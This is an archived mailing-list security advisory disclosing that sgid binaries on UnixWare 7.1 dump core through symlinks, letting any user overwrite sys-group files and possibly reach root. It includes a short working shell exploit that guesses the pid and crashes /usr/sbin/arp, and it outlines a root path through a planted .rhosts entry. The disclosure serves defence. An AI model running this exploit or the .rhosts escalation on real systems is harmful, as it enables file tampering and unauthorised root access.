Greetings, OVERVIEW Any user may cause system files to be overwritten with coredump data. A full root compromise may be possible. BACKGROUND All my testing was done on UnixWare 7.1 though I would imagine 7.x is vulnerable as well. DETAILS UnixWare's sgid binaries are allowed to dump core (but suids are not). By "calculating" the pid of the sgid binary we will call, we can create a symlink from ./core.pid to any file which would be writable by the running group. Many of the sgid binaries are sgid-sys, an extremely sensitive gid to be able to play around with. My arp exploit attached below demonstrates how one would overwrite a file using this vulnerability. Why is a root compromise possible? Well, assuming that we could somehow get "+ +" on a line by itself in the corefile, we could place this into the .rhosts file of some group writable directory/.rhosts. Gaining the additional privileges of any system account is usually a fast ticket to root. EXPLOIT #!/bin/sh #### # Exploit for UnixWare 7.1 - sgid coredumps follow symlinks. # Guessing pid is trivial. Any sgid program which will coredump can be used # -Brock Tellier, btellierat_private #### pid=`expr $$ + 4`; ln -s /path/to/sys/group/writable/file core.$pid /usr/sbin/arp `perl -e "print 'A' x 10000"` Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellierat_private ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:46 PDT